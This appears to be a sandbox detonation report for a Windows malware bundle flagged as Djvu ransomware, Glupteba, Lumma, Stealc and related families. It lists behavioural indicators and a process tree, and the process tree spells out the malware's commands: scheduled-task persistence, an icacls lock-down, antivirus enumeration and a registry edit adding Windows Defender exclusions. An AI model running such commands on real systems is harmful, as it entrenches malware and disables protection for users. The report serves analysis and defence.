| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:51
Platform
win10v2004-20240221-en
Max time kernel
166s
Max time network
289s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
| Destination IP | 193.233.132.49 | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6822f988-ccf5-4e57-afb4-dd971c700c06\\xVovRr115da5UGt7mKVb47Cj.exe\" --AutoStart" | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2816 set thread context of 844 | N/A | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe |
| PID 5096 set thread context of 3608 | N/A | C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3404 set thread context of 412 | N/A | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe |
| PID 6076 set thread context of 5088 | N/A | C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
"C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe"
C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
"C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe"
C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
"C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe"
C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
"C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe"
C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
"C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe"
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
"C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe"
C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
"C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe"
C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
"C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2868 -ip 2868
C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp" /SL5="$501CC,4124890,54272,C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe"
C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
"C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe"
C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
"C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe"
C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
"C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe
"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -i
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"
C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
"C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe"
C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
"C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe"
C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
"C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 344
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe"
C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
"C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe"
C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
"C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe"
C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
"C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
"C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe" -s
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\6822f988-ccf5-4e57-afb4-dd971c700c06" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
"C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 412 -ip 412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 568
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9bc9758,0x7fffa9bc9768,0x7fffa9bc9778
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5820 -ip 5820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 2072
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1896,i,10634171803407864271,14744813896320098422,131072 /prefetch:8
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Program Files\Google\Chrome\Application\chrome.exe
